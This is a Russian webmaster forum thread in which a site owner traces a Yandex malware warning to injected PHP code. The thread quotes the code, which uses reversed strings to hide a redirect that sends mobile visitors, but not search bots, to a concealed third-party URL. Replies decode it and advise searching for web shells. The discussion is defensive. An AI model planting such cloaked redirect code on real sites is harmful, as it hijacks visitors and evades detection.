[vovasit91]

Помогите найти вирус на сайте
Гугл ничего не видит. Яндекс же пишет что на сайте вирус
http://tech2all.ru/articles/87-kak-p...mu-nomeru.html Поведенческий анализ
Я просмотрел код и не увидел никакого вируса. До этого 2 года подряд ничего не было и тут вдруг на тебе. Подскажите хотя бы на какую строчку жалуется.
Нод вирус тоже не видит. Левых айфреймов тоже не нашел.

[druzhkov]

vovasit91, с посторонних сайтов ничего не грузится, яваскрипты внешне чистые. Я бы посоветовал проверить даты изменения скриптов на самом сайте. Ничего не модифицировалось за последнее время?

[vovasit91]

Я в html код не лазил несколько месяцев. Странный яндекс... Толи действительно вирус, то ли яндекс выеживается

[SPQR]

Внимательнее, ребята
http://online3.drweb.com/cache/?i=df...d4d7596e62e667

http://www.revisium.com/ai/ - для начала хватит.
Если не вылечит - будем принимать более действенные методы.

[izyalex]

многа букаф

error Blacklisted: Yes
check Malware: No
check Malicious javascript: No
check Malicious iFrames: No
check Drive-By Downloads: No
check Anomaly detection: No
check IE-only attacks: No
check Suspicious redirections: No
check Spam: No


Domain blacklisted By Yandex (via Sophos): tech2all.ru

[свернуть]

Исходя из этого, на сайте вредоносного тела уже нет. Видимо Вы его уже вичистили, но сайт остался в блек листах яндекса.
В вебмастер инструментах Я поставьте на перепроверку, и ждите, примерно от 12 до 48 часов пересканируют.

[vovasit91]

Исходя из этого, на сайте вредоносного тела уже нет. Видимо Вы его уже вичистили, но сайт остался в блек листах яндекса. В вебмастер инструментах Я поставьте на перепроверку, и ждите, примерно от 12 до 48 часов пересканируют.

Поставил на перепроверку: итог вирус все равно есть...

---------- Сообщение добавлено 20:39 ---------- Предыдущее 20:14 ----------

Нашел вредоносный код

Код HTML:

$gant = strtolower($_SERVER[strrev(strtoupper('tnega_resu_ptth'))]);$ref = $_SERVER[strrev(strtoupper('tsoh_ptth'))];
if(!preg_match('/crawl|andex|oogle|bot/i',$gant)) {
if((preg_match('/ndroi|htc_|htc-|okia|pera min|j2me|martph|pera mo|peramob|ymbian/i',$gant)) and (!isset ($_COOKIE['dle_user_id'])) and($_SERVER['REQUEST_URI'] != '/')) 
{header(strrev('=REREFER_PTTH&1=ru&5?bus'.'/artemed/'.'tneilc'.'/ten.'.'yr'.'ga'.'//:pt'.'th :noi'.'tac'.'oL').$ref);exit;}}

Граждане программаторы, расскажите что это за код такой

[izyalex]

Перенаправляет с поисковиков и мобильников на закодированную ссылку через strrev.

более понятный код

PHP код:

$gant = strtolower($_SERVER[strrev(strtoupper('tnega_resu_ptth')) ]);
$ref = $_SERVER[strrev(strtoupper('tsoh_ptth')) ];

if (!preg_match('/crawl|andex|oogle|bot/i', $gant))
    {
    if ((preg_match('/ndroi|htc_|htc-|okia|pera min|j2me|martph|pera mo|peramob|ymbian/i', $gant)) and (!isset($_COOKIE['dle_user_id'])) and ($_SERVER['REQUEST_URI'] != '/'))
        {
        header(strrev('=REREFER_PTTH&1=ru&5?bus' . '/artemed/' . 'tneilc' . '/ten.' . 'yr' . 'ga' . '//:pt' . 'th :noi' . 'tac' . 'oL') . $ref);
        exit;
        }
    } 


[свернуть]

Нужно искать по файлам шеллы, и вставки лишнего кода чистить.

[voffka]

Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 1 сообщение(ий)):

У вас нет прав чтобы видеть скрытый текст, содержащийся здесь.

[druzhkov]

strtolower($_SERVER[strrev(strtoupper('tnega_resu_ptth'))])

Ух ты, я еще такого не видел - прячут код через обратное написание.

Как написали предыдущие ораторы - ищите лазейку, через которые вам меняют скрипты. Бывает - шелл видно явно, бывает - прячут в какую-нибудь картинку, бывает - через фтп и т.д.

Если есть родная версия сайта (точно без вирусов), можно сделать пофайловое сравнение. В-общем, пробуйте. Могу предложить свою помощь.

[terrik]

ТС, в каком именно файле нашли этот код?